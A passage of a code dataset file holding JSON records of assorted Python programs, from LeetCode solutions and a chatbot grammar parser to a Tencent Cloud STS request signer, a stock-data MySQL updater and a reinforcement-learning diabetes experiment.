if obstacleGrid[i][j] else dp[i - 1][j] + dp[i][j - 1]\r\n\r\n return dp[-1][-1]\r\n\r\n\r\nif __name__ == "__main__":\r\n sol = Solution()\r\n matrix = [\r\n [0, 0, 0],\r\n [0, 1, 0],\r\n [0, 1, 0]\r\n ]\r\n print(sol.uniquePathsWithObstacles(matrix))\r\n\r\n matrix = [[1]]\r\n print(sol.uniquePathsWithObstacles(matrix))\r\n","sub_path":"accepted/063.unique-paths-ii.py","file_name":"063.unique-paths-ii.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"112371978","text":"# coding=utf-8\n#!/usr/bin/env python\n\nfrom stack import stack\n\ndef dec2binari(nombre, base):\n r = stack()\n s = ''\n n_digits = 0\n while nombre > 0:\n rem = nombre % base\n r.push(rem) # PUSH THE NEXT DIGIT ONTO THE STACK\n nombre //= base\n n_digits += 1\n for _ in range(n_digits):\n s = s + str(r.top()) # POP EACH DIGIT BACK OFF THE STACK\n r.pop()\n return s # RETURN THE NUMBER WRITTEN IN THE TARGET BASE.\n","sub_path":"2N S/INFORMÀTICA-2_1/EXERCICIS_CLASE/dec2binari.py","file_name":"dec2binari.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"49263252","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 25 20:45:30 2017\n\nScript that creates and processes a sample spectrum. The overallpath\nis the folder where any of the processed files are written out to. The path\nis the folder where all of the individual sample and background DFGs are saved.\n\nVarious lines can be commented/uncommented to write the data to file and/or\nplot it.\n\n1. Initialization imports the individual sample and background DFGs.\n\n2. 
Any cosmic rays are removed from the sample or background DFGs (see header of \nspectrum.py for details)\n\n3. The appropriate background dfg is subtracted from each sample DFG.\n\n4. Each individual DFG is padded with zeros. This occurs since they are all\nhorizontally shifted with respect to one another (the whole point of taking \nmultiple is to cover more frequency space), so they can be then be summed.\n\n5. These padded DFGs are then summed.\n\n6. The individual DFGs are then truncated according to the positions determined\nby the gold reference.\n\n7. These truncated DFGs are then summed.\n\n@author: pohno\n\"\"\"\n\nfrom spectrum import Spectrum\n\nimport os\n\n#path to where files are written to\noverallpath = '/Users/pohno/Box Sync/Science/Data/SFG/Solstice/11192017'\n\n#name where summedTruncatedData is written to\nname = 'flowrun2.txt'\n\n#path where the data is stored\npath = '/Users/pohno/Box Sync/Science/Data/SFG/Solstice/11192017/caf2_water/run2'\n\n#create object, loads each sample and background DFG\nspec = Spectrum(path)\n\n#change directory in case files are written \nos.chdir(overallpath)\n\n#plot pre cosmic ray removal\nspec.plotDFGs()\nspec.plotBGs()\n\n#remove cosmic rays\nspec.removeCRs(50)\n\n#plot after cosmic ray removal\nspec.plotDFGs()\nspec.plotBGs()\n\n#change directory in case files are written \nspec.subtractBGs()\n\n#plot after background subtraction\nspec.plotDFGs()\n\n#pad the dfgs with zeros so they align and can be summed up\nspec.padDFGs()\n\n#plot the full DFGs\nspec.plotFullDFGs()\n\n#sum the padded DFGs\nspec.sumFullDFGs()\n\n#write sum of padded DFGs to file\n#spec.writeSumDFG('flowrun2Raw.txt')\n\n#plot the sum of the DFGs\nspec.plotSumDFG()\n\n#truncate the DFGs according to the gold reference spectrum\nspec.truncateFullDFGs(gold)\n\n#plot the truncated DFGs\nspec.plotTruncatedDFGs()\n\n#summ the truncated DFGs\nspec.sumTruncatedDFGs()\n\n#plot the summed, truncated spectrum\nspec.plotSumTruncatedDFG()\n\n#write the summed, truncated spectrum to file\nspec.writeSumTruncatedDFG(name)","sub_path":"Python/importSample.py","file_name":"importSample.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"461722228","text":"# 81: Crie um script onde a idade da pessoa e de 12 anos, se a idade,\n# for < 4: o preço = 0 se for < 18: preço = 5\n# senão: preço = 10 ,\n# por ultimo faça uma mensagem ‘Seu custo de admissão e $' concatenando com o preço,\n# converta o preço para str() use if-elif-else: explique.\n\nidade = 12\n\nif idade < 4:\n preco = 0\nelif idade < 18:\n preco = 4\nelse:\n preco = 10\n\nprint(\"Seu custo de admissão é R$ \" + str(preco) + \", para entrar.\")\n\n'''\nO codigo faz o print uma vez so, e usa a variavel no if-elif-else para saber o valor que deve ser\nexibido para o usuario, isso fica mais claro o codigo.\n'''","sub_path":"python_crash_course/chapter_05_if/desafio_0081.py","file_name":"desafio_0081.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"451635110","text":"from lxml import etree\n\nimport json\nimport os\n\nfrom cleanup.utils import check_file_exists\n\nXML_FILEPATH = '..\\\\dataset\\\\rowiki-20230501-pages-meta-current.xml\\\\rowiki-20230501-pages-meta-current.xml'\nARTICLES_FILEPATH = '..\\\\articles.json'\n\n\n\n\n# function that parses a large xml file and prints out the top level tags\ndef parse_xml_file(filepath):\n if 
check_file_exists(filepath):\n context = etree.iterparse(filepath, events=('start', 'end'))\n for event, elem in context:\n if event == 'start':\n print(elem.tag)\n elem.clear()\n else:\n print(\"File does not exist\")\n\n\n\n# function that recursively prints the xml subtags of a given xml tag by using lxml\n# try to print it in a more readable way by keeping track of the depth of the tag\ndef print_subtags(tag, depth=0):\n print(' ' * depth + tag.tag.removeprefix('{http://www.mediawiki.org/xml/export-0.10/}')) \n #if(tag.text):\n # print(' ' * depth + tag.text)\n for child in tag:\n print_subtags(child, depth + 1)\n\n\n\n# function that parses a large xml file and reads all the tags with a given tag name\n# for each tag identified it searches for another two subtags named text, title and saves the text in an object\ndef parse_xml_contents(filepath):\n if check_file_exists(filepath):\n wikia_content = []\n\n context = etree.iterparse(filepath, events=('end',), tag='{http://www.mediawiki.org/xml/export-0.10/}page')\n # add a filter if the tag is not in the list of tags\n\n # add a counter to each article and print it\n counter = 0\n\n for event, elem in context:\n title = elem.find('{http://www.mediawiki.org/xml/export-0.10/}title').text\n try:\n content = elem.find('{http://www.mediawiki.org/xml/export-0.10/}revision/{http://www.mediawiki.org/xml/export-0.10/}text').text\n except:\n print(elem)\n print(elem.tag)\n for event,elem in context.children:\n print(f\"{event} - {elem.tag}\")\n raise Exception(\"No content found\")\n wikia_article = {\n 'title': title,\n 'content': content\n }\n wikia_content.append(wikia_article)\n\n counter +=1\n if(counter % 1000 == 0):\n print(counter)\n #print('the content of the article is:')\n #print(wikia_content)\n #break\n \n return wikia_content\n\n else:\n print(\"File does not exist\")\n\n\n# write the articles to a file\ndef write_articles_to_file(filepath, articles):\n if not os.path.isfile(filepath):\n with open(filepath, 'w') as f:\n json.dump(articles, f, indent=4)\n else:\n print(\"File already exists\")\n\n# function that parses al arge xml file and prints the content of the tag with the given name\ndef parse_xml_file_tags(filepath, tags):\n if check_file_exists(filepath):\n context = etree.iterparse(filepath, events=('start', 'end'))\n # add a filter if the tag is not in the list of tags\n for event, elem in context: \n if event == 'start' and elem.tag in tags:\n print('=================================== Article Start ===================================')\n print_subtags(elem)\n elif(event == 'end' and elem.tag in tags):\n print('=================================== Article End ===================================') \n elem.clear()\n else:\n print(\"File does not exist\")\n\n\ndef main():\n articles = parse_xml_contents(XML_FILEPATH)\n write_articles_to_file(ARTICLES_FILEPATH, articles)\n\nmain()","sub_path":"cleanup/data_extraction.py","file_name":"data_extraction.py","file_ext":"py","file_size_in_byte":3732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"212959086","text":"#! /c/Python27/python\n# -*- coding: utf-8 -*-\n\"\"\"\n nyanbot.grammar\n ~~~~~~~~~~~~~~~\n\n Tokenizing and parsing chatbot commands.\n Shamelessly copied from watson (also another chatbot).\n\"\"\"\n\nclass Constant(object):\n \"\"\"\n A token object that represents a string literal. 
The literal may have a / in it to \n denote multiple values\n \"\"\"\n\n def __init__(self, name):\n self.values = name.split(\"/\")\n\n def match(self, word):\n \"\"\"\n Returns whether or not the word matches this constant's patterns\n \"\"\"\n return word in self.values\n\n def __repr__(self):\n return \"/\".join(self.values)\n\n\nclass Variable(object):\n \"\"\"\n A token object that represents a variable. All variables must contain < and >, and \n can have a prefix and/or suffix\n \"\"\"\n\n def __init__(self, name):\n i = name.find(\"<\")\n j = name.find(\">\")\n inner = name[i + 1:j]\n if not inner:\n raise Exception\n parts = inner.split(\"=\")\n if len(parts) == 1:\n self.name = parts[0]\n self.options = []\n else:\n # they put in some options we should save\n self.name = parts[0]\n self.options = parts[1].split(\"/\")\n\n self.prefix = name[:i]\n self.postfix = name[j + 1:]\n self.value = None\n\n def match(self, word):\n \"\"\"\n Returns whether or not the given word matches this variable's pattern, and sets \n its value if there is a match\n \"\"\"\n if word.startswith(self.prefix) and word.endswith(self.postfix):\n value = word[len(self.prefix):len(word) - len(self.postfix)]\n if not self.options or value in self.options:\n self.value = value\n return True\n return False\n\n def __repr__(self):\n return self.prefix + \"<\" + self.name + \">\" + self.postfix\n\n\ndef _create_options(string):\n \"\"\"\n Takes a syntax string and parses out all matching square brackets, and returns a list \n of all combinations of syntaxes that could be formed if the brackets were there or not\n \n ARGUMENTS\n string - the syntax string\n \n RETURNS\n a list of syntax strings that match whether the optional pieces may be present or not\n \n EXAMPLES\n _create_options(\"cow\") -> [\"cow\"]\n _create_options(\"cow [or lamb]\") -> [\"cow\",\"cow or lamb\"]\n _create_options(\"cow [or lamb[ada]]\") -> [\"cow\",\"cow or lamb\", \"cow or lambada\"]\n \"\"\"\n count = 0\n had_counted = False\n i = 0\n options = []\n\n for j in range(len(string)):\n if string[j] == \"[\":\n count += 1\n if not had_counted:\n i = j\n had_counted = True\n if string[j] == \"]\":\n count -= 1\n if not had_counted:\n raise Exception\n if count == 0 and had_counted:\n if not options:\n options = [_create_options(string[:i] + string[i + 1:j] + string[j + 1:]),\n _create_options(string[:i] + string[j + 1:])]\n options = [x for y in options for x in y]\n if count != 0:\n raise Exception\n\n if not options:\n options = [string]\n return options\n\n\ndef _populate_results(grammar):\n \"\"\"\n Takes a grammar that has been matched, and returns the values of its variables\n \"\"\"\n result = dict()\n for node in grammar:\n if isinstance(node, Variable):\n result[node.name] = node.value\n return result\n\n\ndef _create_grammar(grammar_string):\n \"\"\"\n Creates a grammar construct from a string by tokenizing by whitespace, then creating \n Constants and Variables for each token\n \"\"\"\n grammar = []\n\n words = grammar_string.split()\n\n for word in words:\n if word.find(\"<\") >= 0 or word.find(\">\") >= 0:\n if not (word.count(\"<\") == 1 and word.count(\">\") == 1 and word.find(\">\") > word.find(\"<\")):\n raise Exception\n node = Variable(word)\n else:\n node = Constant(word)\n grammar.append(node)\n return grammar\n\n\ndef create_grammars(grammar_string):\n \"\"\"\n Creates a list of all possible grammar objects from a string that may contain \n optional parts\n \"\"\"\n options = _create_options(grammar_string)\n return 
[_create_grammar(option) for option in options]\n\n\ndef _match_grammar(string, grammar):\n \"\"\"\n Determines if a string is a match for a grammar construct\n \"\"\"\n words = string.split()\n\n last = len(grammar) - 1\n for i, node in enumerate(grammar):\n if i > len(words) - 1:\n return False\n\n if i == last:\n return _populate_results(grammar) if node.match(\" \".join(words[i:])) else False\n\n if not node.match(words[i]):\n return False\n\n\ndef match_grammars(string, grammars):\n \"\"\"\n Takes a string and an iterable of grammars, and returns True if any of the grammars \n are matched by the string\n \n ARGUMENTS\n string - the input string we're matching against\n grammars - an iterable of grammars to check against\n \n RETURNS\n True if any of the grammars matched, False if not\n \"\"\"\n for grammar in grammars:\n result = _match_grammar(string, grammar)\n if result is not False:\n return result\n return False\n","sub_path":"nyanbot/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":5376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"590541368","text":"# coding=utf-8\r\nclass Solution(object):\r\n def totalHammingDistance(self, nums):\r\n \"\"\"\r\n :type nums: List[int]\r\n :rtype: int\r\n \"\"\"\r\n n = len(nums)\r\n if n == 0:\r\n return 0\r\n res = 0\r\n ma = len(bin(max(nums))) - 2\r\n while ma > 0:\r\n #temp = map(lambda x: x % 2, nums)\r\n count = len(filter(lambda x: x % 2 == 1, nums))\r\n res += count * (n-count)\r\n nums = map(lambda x: x / 2 , nums)\r\n #print temp, count, nums\r\n ma -= 1\r\n return res\r\n","sub_path":"S-Z/Total Hamming Distance.py","file_name":"Total Hamming Distance.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"263429635","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 2 17:17:44 2021\n\n@author: Camilo\n\"\"\"\n\n\nfrom random import randint\nfrom objetosjuego import *\n\nclass Carro:\n \n def __init__(self,jugador,f1):\n self.jugador=jugador\n self.f1=f1\n \n# Dist_Pistas={'Monza':4.1,\n# 'Bahrein':5.4,\n# 'Portimao':4.6,\n# 'Silverstone':5.8\n# }\n\nDist_Pistas={'Monza':4100,\n 'Bahrein':5400,\n 'Portimao':4600,\n 'Silverstone':5800\n }\n\n\nPistas={'Monza':'4.1 km',\n 'Bahrein':'5.4 km',\n 'Portimao':'4.6 km',\n 'Silverstone': '5.9 km'\n }\nX=['Monza', 'Bahrein','Portimao','Silverstone']\n\n\n\n#1. Configuración del juego\n\nprint('Bienvenido al Juego de Carros por consola!'+'\\n' + 'Seleccione una de las siguientes pistas a continuación:\\n' )\ncontador=1\nfor x, y in Pistas.items():\n print(str(contador)+'. ' + x, y)\n contador+=1\n \n\nSeleccion=int(input(\"Seleccione una de las opciones anteriores. 
En caso de no querer jugar, ingrese el número 0 para finalizar el juego: \"))\nwhile True:\n if Seleccion==1:\n Seleccion=X[0]\n break\n elif Seleccion==2:\n Seleccion=X[1]\n break\n elif Seleccion==3:\n Seleccion=X[2]\n break\n elif Seleccion==4:\n Seleccion=X[3]\n break\n elif Seleccion==0:\n break\n print(Seleccion)\n \n\n#!-------------------------------------especificar jugadores y crear los objetos con carros asignados\n\ncantidad_jugadores=int(input(\"Por favor indique cuantas personas van a participar del juego: \"))\ncarriles= []\n\ndistancia_pista=(Dist_Pistas.get(Seleccion)) \n\ndistancia_faltante=[]\nfor i in range(cantidad_jugadores):\n distancia_faltante.append(distancia_pista) \n\nfor i in range (cantidad_jugadores):\n jugador=input(\"Ingrese su nombre: \")\n f1=input(\"Ingrese su vehiculo: \")\n formula=Carro(jugador,f1)\n carriles.append(formula)\n \ndef desplazamientos(lanzar):\n global desplazar\n dado=randint(1,6)\n desplazar=dado*100\n print(f\"Distancia recorrida: {desplazar} metros.\")\n return desplazar\n\n\n#2. Inicio del juego\nprint(\"\\nRecuerde que en el orden en el que se registraron los participantes, será el orden para avanzar en el juego.\\n\")\n\n\n\npodio=[0,0,0]\nwhile True:\n for i in range(len(carriles)):\n pulsa=input(\"Pulse . para lanzar dados: \")\n desplazamientos(pulsa)\n distancia_faltante[i]=distancia_faltante[i]-desplazar\n print(f\"distancia para llegar a meta {distancia_faltante[i]} metros\")\n if distancia_faltante[i]<=0:\n podio[0].append(carriles[i])\n carriles.pop(0)\n if podio[0]!=0:\n for i in range(len(carriles)):\n pulsa=input(\"Pulse . para lanzar dados: \")\n desplazamientos(pulsa)\n distancia_faltante[i]=distancia_faltante[i]-desplazar\n print(f\"distancia para llegar a meta {distancia_faltante[i]} metros\")\n \n \n \n \n\n\n\n\n\n \n\n\n\n\n\n\n \n\n \n ","sub_path":"juegodecarros.py","file_name":"juegodecarros.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"415357481","text":"from rllab.algos.tnpg import TNPG\nfrom rllab.baselines.linear_feature_baseline import LinearFeatureBaseline\nfrom rllab.envs.gym_env import GymEnv\nfrom rllab.envs.normalized_env import normalize\nfrom rllab.policies.gaussian_mlp_policy import GaussianMLPPolicy\nfrom rllab.misc.instrument import run_experiment_lite\n\ntry:\n import seaborn as sns\n sns.set()\nexcept ImportError:\n print('\\nConsider installing seaborn (pip install seaborn) for better plotting!')\n\n\n# ==========================================================================\n# OpenAI diabetes envs - HovorkaInterval starts at the same value every time,\n# HovorkaIntervalRandom starts at a random value\n# ==========================================================================\n\ndef run_task(*_):\n env = normalize(GymEnv('HovorkaInterval-v0'))\n # env.wrapped_env.env.env.env.reward_flag = 'absolute'\n env.wrapped_env.env.env.reward_flag = 'gaussian'\n\n\n baseline = LinearFeatureBaseline(env_spec=env.spec)\n\n learn_std = True\n init_std=1\n\n # hidden_sizes=(8,)\n hidden_sizes=(32, 32)\n # hidden_sizes=(100, 50, 25)\n\n policy = GaussianMLPPolicy(\n env_spec=env.spec,\n hidden_sizes=hidden_sizes,\n learn_std=learn_std,\n init_std=init_std\n )\n\n # =======================\n # Defining the algorithm\n # =======================\n batch_size = 5000\n n_itr = 200\n gamma = .9\n step_size = 0.01\n\n algo = TNPG(\n env=env,\n policy=policy,\n baseline=baseline,\n batch_size=batch_size,\n 
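# batch_size is the number of environment steps sampled per iteration;\n # n_itr and step_size below set the iteration count and the size of each\n # natural-gradient update\n 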
n_itr=n_itr,\n discount=gamma,\n step_size=step_size\n )\n algo.train()\n\n return algo\n\n\n# log_dir = '~/Dropbox/results/jonas_experiments/no_stub/'\nDROPBOX_DIR = '/home/jonas/Dropbox/results/jonas_experiments/'\n# log_dir = DROPBOX_DIR + 'tnpg/gaussian/5000/8'\nlog_dir = DROPBOX_DIR + 'tnpg/gaussian/5000/32_32'\n# log_dir = DROPBOX_DIR + 'tnpg/gaussian/5000/100_50_25'\n# Running and saving the experiment\nrun_experiment_lite(\n run_task,\n # algo.train(),\n log_dir=log_dir,\n # n_parallel=2,\n n_parallel=1,\n # Only keep the snapshot parameters for the last iteration\n snapshot_mode=\"last\",\n # Specifies the seed for the experiment. If this is not provided, a random seed\n # will be used\n # exp_prefix=\"TNPG_\" + '32_32_',\n # exp_prefix=data_dir\n plot=False\n)\n\n\n","sub_path":"diabetes_experiments/scripts/tnpg_script_no_stub.py","file_name":"tnpg_script_no_stub.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"432080569","text":"# -*- coding:utf-8 -*-\nimport hashlib\nimport requests\nimport hmac\nimport random\nimport time\nimport base64\nfrom urllib import parse\n\nclass STS(object):\n def __init__(self, SecretId, SecretKey, RoleName, ExpireTime):\n self.SecretId = SecretId\n self.SecretKey = SecretKey\n self.RoleName = RoleName\n self.ExpireTime = ExpireTime\n self.requestHost = 'sts.api.qcloud.com'\n self.requestUri = '/v2/index.php?'\n\n def sts_param(self):\n keydict = {\n 'Action' : 'AssumeRole',\n 'roleArn' : self.RoleName,\n 'Verson' : '2017-03-12',\n 'roleSessionName' : 'cosrole',\n 'durationSecond' : str(self.ExpireTime),\n 'Region': 'ap-shanghai',\n 'Timestamp': str(int(time.time())),\n 'Nonce': str(int(random.random() * 1000)),\n 'SecretId': self.SecretId,\n }\n sortlist = sorted(zip(keydict.keys(), keydict.values()))\n return sortlist\n\n def sts_str_sign(self):\n sortlist = self.sts_param()\n sts_str_init = ''\n for value in sortlist:\n sts_str_init += str(value[0]) + '=' + str(value[1]) + '&'\n sts_str_init = sts_str_init[:-1]\n sign_str = 'GET' + self.requestHost + self.requestUri + sts_str_init\n return sign_str, sts_str_init\n\n def get_result_url(self):\n sign_str, sts_str_init = self.sts_str_sign()\n secretkey = self.SecretKey\n signature = bytes(sign_str, encoding='utf-8')\n secretkey = bytes(secretkey, encoding='utf-8')\n my_sign = hmac.new(secretkey, signature, hashlib.sha1).digest()\n my_sign = base64.b64encode(my_sign)\n result_sign = parse.quote(my_sign)\n result_url = 'https://' + self.requestHost + self.requestUri + sts_str_init + '&Signature=' + result_sign\n return result_url\n\nif __name__ == '__main__':\n SecretId = 'AKID54rSwEDD'\n SecretKey = 'qUI1zjF'\n RoleName = 'qcs::cam::uin/353488552:roleName/listcvm'\n ExpireTime = 3600\n STSoper = STS(SecretId, SecretKey, RoleName, ExpireTime)\n url = STSoper.get_result_url()\n try:\n response = requests.get(url)\n if response.status_code == 200:\n print(response.text)\n data = response.json()\n tmpSecretId = data['data']['credentials']['tmpSecretId']\n tmpSecretKey = data['data']['credentials']['tmpSecretKey']\n sessionToken = data['data']['credentials']['sessionToken']\n expiredTime = data['data']['expiration']\n print('Get sessionToken: %s' % sessionToken)\n print('Get tmpSecretId: %s' % tmpSecretId)\n print('Get tmpSecretKey: %s' % tmpSecretKey)\n print('Expiration: %s' % expiredTime)\n except Exception as e:\n 
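# minimal error handling for this example script: just print whatever the\n # STS request or the response parsing raised\n 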
print(e)\n\n\n","sub_path":"Qcloud/STS/getTmpRole.py","file_name":"getTmpRole.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"202320277","text":"# Given a string, find the shortest possible string which can be achieved by\n# adding characters to the end of initial string to make it a palindrome.\n\n# + Example\n\n# - For st = \"abcdc\", the output should be\n# > buildPalindrome(st) = \"abcdcba\".\n\n# + Input/Output\n\n# - [execution time limit] 4 seconds (py3)\n# - [input] string st\n# A string consisting of lowercase latin letters.\n# Guaranteed constraints:\n# 3 ≤ st.length ≤ 10.\n# - [output] string\n\n# + Solution\n\n# - 8/8\n\n\ndef buildPalindrome(s):\n pos = 0\n posLast = len(s) - 1\n\n for i, e in enumerate(s):\n if posLast <= pos:\n break\n elif e == s[posLast]:\n posLast -= 1\n else:\n pos = i + 1\n posLast = len(s) - 1\n\n return s + s[:pos][::-1]\n\n\nprint(buildPalindrome(\"abcdc\"))\n# > \"abcdcba\"\n","sub_path":"code-fights/arcade/intro/10-eruption-of-light/45-build-palindrome.py","file_name":"45-build-palindrome.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"238847866","text":"from datetime import datetime\nfrom apscheduler.schedulers.background import BackgroundScheduler\nimport mysql.connector\nfrom datetime import date\nimport datetime\nimport time\nimport yahoo_fin.stock_info as yf\n\nstocks = ['AAPL', 'AMZN', 'FB', 'GOOGL', 'NFLX', 'TSLA', 'TWTR', 'YELP', 'VAC', 'TRIP']\n\n# connect to mysql database\nmydb = mysql.connector.connect(\n host=\"127.0.0.1\",\n user=\"root\",\n passwd=\"*********\",\n database=\"SuperStonks\",\n buffered=True,\n \n)\n\nmycursor = mydb.cursor()\nmycursor.execute(\"SET SQL_SAFE_UPDATES = 0;\")\n\n\n\ndef get_hist():\n\n for stock in stocks:\n mycursor.execute(\"SELECT sid from stocks where ticker='\" + stock + \"'\")\n result = mycursor.fetchall()\n sid = result[0][0]\n\n data = yf.get_data(ticker=stock, start_date=date.today())\n dat = date.today()\n open_value = data.iloc[0, :]['open']\n close_value = data.iloc[0, :]['close']\n low = data.iloc[0, :]['low']\n high = data.iloc[0, :]['high']\n volume = data.iloc[0, :]['volume']\n sql = \"INSERT IGNORE INTO historical (sid,dat,open_value,low,high,close_value,volume) \" \\\n \"VALUES (%s,%s,%s,%s,%s,%s,%s)\"\n val = (str(sid), str(dat), str(open_value), str(low), str(high), str(close_value), str(volume))\n mycursor.execute(sql, val)\n mydb.commit()\n\n\ndef get_real():\n limit = 2500\n now = time.time()\n ts = datetime.datetime.fromtimestamp(now).strftime('%Y-%m-%d %H:%M:%S')\n dt_array = ts.strip().split(\" \")\n dat = dt_array[0].strip()\n tim = dt_array[1].strip()\n\n for stock in stocks:\n details = yf.get_quote_table(stock)\n\n open_value = str(details['Open']).replace(',', '')\n day_range = str(details['Day\\'s Range']).strip().split(\"-\")\n low = day_range[0].strip().replace(',', '')\n high = day_range[len(day_range) - 1].strip().replace(',', '')\n close_value = str(yf.get_live_price(stock))\n volume = str(details['Volume']).replace(',', '')\n\n mycursor.execute(\"SELECT sid from stocks where ticker='\" + stock + \"'\")\n result = mycursor.fetchall()\n sid = str(result[0][0])\n\n sql = \"INSERT IGNORE INTO real_time (sid,dat,tim,open_value,low,high,close_value,volume) \" \\\n \"VALUES (%s,%s,%s,%s,%s,%s,%s,%s)\"\n val = (sid, dat, tim, open_value, low, high, close_value, volume)\n 
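# note: INSERT IGNORE only skips duplicate rows if the real_time table\n # enforces a unique key over these columns (assumed here, e.g. sid/dat/tim)\n 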
print(val)\n mycursor.execute(sql, val)\n mydb.commit()\n\n\n mycursor.execute(\"SELECT count(*) from real_time where sid='\" + str(sid) + \"'\")\n result = mycursor.fetchall()\n rows = int(result[0][0])\n if rows > limit:\n num_delete = rows - limit\n sql = \"delete from real_time where sid='\" + str(sid) + \"' order by dat asc, tim asc limit \" \\\n + str(num_delete) + \";\"\n mycursor.execute(sql)\n mydb.commit()\n\n\ndef start():\n scheduler = BackgroundScheduler(daemon=True)\n scheduler.add_job(get_real, trigger='cron', hour = '10-15', minute = '0-59', second = '0', day_of_week = '0-4')\n scheduler.add_job(get_hist, trigger='cron', hour='17', minute='0', second='0', day_of_week='0-4')\n scheduler.start()\n\nif __name__ == \"__main__\":\n get_real()","sub_path":"updater/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"100768885","text":"import numpy as np\nfrom SimPEG import Utils, Survey\nimport properties\n\n\nclass GlobalAEMSurvey(Survey.BaseSurvey, properties.HasProperties):\n\n # This assumes a multiple sounding locations\n rx_locations = properties.Array(\n \"Receiver locations \", dtype=float, shape=('*', 3)\n )\n src_locations = properties.Array(\n \"Source locations \", dtype=float, shape=('*', 3)\n )\n topo = properties.Array(\n \"Topography\", dtype=float, shape=('*', 3)\n )\n\n half_switch = properties.Bool(\"Switch for half-space\", default=False)\n\n _pred = None\n\n\n\n @Utils.requires('prob')\n def dpred(self, m, f=None):\n \"\"\"\n Return predicted data.\n Predicted data, (`_pred`) are computed when\n self.prob.fields is called.\n \"\"\"\n if f is None:\n f = self.prob.fields(m)\n\n return self._pred\n\n @property\n def n_sounding(self):\n \"\"\"\n # of Receiver locations\n \"\"\"\n return self.rx_locations.shape[0]\n\n def read_xyz_data(self, fname):\n \"\"\"\n Read csv file format\n This is a place holder at this point\n \"\"\"\n pass\n\n @property\n def nD(self):\n # Need to generalize this for the dual moment data\n if getattr(self, '_nD', None) is None:\n self._nD = self.nD_vec.sum()\n return self._nD\n\nclass GlobalAEMSurveyTD(GlobalAEMSurvey):\n\n # --------------- Essential inputs ---------------- #\n src_type = None\n\n rx_type = None\n\n field_type = None\n\n time = []\n\n wave_type = None\n\n moment_type = None\n\n moment = None\n\n time_input_currents = []\n\n input_currents = []\n\n # --------------- Selective inputs ---------------- #\n n_pulse = properties.Array(\n \"The number of pulses\",\n default=None\n )\n\n base_frequency = properties.Array(\n \"Base frequency (Hz)\",\n dtype=float, default=None\n )\n\n offset = properties.Array(\n \"Src-Rx offsets\", dtype=float, default=None,\n shape=('*', '*')\n )\n\n I = properties.Array(\n \"Src loop current\", dtype=float, default=None\n )\n\n radius = properties.Array(\n \"Src loop radius\", dtype=float, default=None\n )\n\n use_lowpass_filter = properties.Array(\n \"Switch for low pass filter\",\n dtype=bool, default=None\n )\n\n high_cut_frequency = properties.Array(\n \"High cut frequency for low pass filter (Hz)\",\n dtype=float, default=None\n )\n\n # ------------- For dual moment ------------- #\n\n time_dual_moment = []\n\n time_input_currents_dual_moment = []\n\n input_currents_dual_moment = []\n\n base_frequency_dual_moment = properties.Array(\n \"Base frequency for the dual moment (Hz)\",\n dtype=float, default=None\n )\n\n def __init__(self, **kwargs):\n 
GlobalAEMSurvey.__init__(self, **kwargs)\n self.set_parameters()\n\n def set_parameters(self):\n # TODO: need to put some validation process\n # e.g. for VMD `offset` must be required\n # e.g. for CircularLoop `a` must be required\n\n print(\">> Set parameters\")\n if self.n_pulse is None:\n self.n_pulse = np.ones(self.n_sounding, dtype=int) * 1\n\n if self.base_frequency is None:\n self.base_frequency = np.ones(\n (self.n_sounding), dtype=float\n ) * 30\n\n if self.offset is None:\n self.offset = np.empty((self.n_sounding, 1), dtype=float)\n\n if self.moment is None:\n self.moment = np.ones(self.n_sounding, dtype=float)\n\n if self.radius is None:\n self.radius = np.empty(self.n_sounding, dtype=float)\n\n if self.use_lowpass_filter is None:\n self.use_lowpass_filter = np.zeros(self.n_sounding, dtype=bool)\n\n if self.high_cut_frequency is None:\n self.high_cut_frequency = np.empty(self.n_sounding, dtype=float)\n\n if self.moment_type is None:\n self.moment_type = np.array([\"single\"], dtype=str).repeat(\n self.n_sounding, axis=0\n )\n\n # List\n if not self.time_input_currents:\n self.time_input_currents = [\n np.empty(1, dtype=float) for i in range(self.n_sounding)\n ]\n # List\n if not self.input_currents:\n self.input_currents = [\n np.empty(1, dtype=float) for i in range(self.n_sounding)\n ]\n\n # List\n if not self.time_dual_moment:\n self.time_dual_moment = [\n np.empty(1, dtype=float) for i in range(self.n_sounding)\n ]\n # List\n if not self.time_input_currents_dual_moment:\n self.time_input_currents_dual_moment = [\n np.empty(1, dtype=float) for i in range(self.n_sounding)\n ]\n # List\n if not self.input_currents_dual_moment:\n self.input_currents_dual_moment = [\n np.empty(1, dtype=float) for i in range(self.n_sounding)\n ]\n\n if self.base_frequency_dual_moment is None:\n self.base_frequency_dual_moment = np.empty(\n (self.n_sounding), dtype=float\n )\n\n @property\n def nD_vec(self):\n if getattr(self, '_nD_vec', None) is None:\n self._nD_vec = []\n\n for ii, moment_type in enumerate(self.moment_type):\n if moment_type == 'single':\n 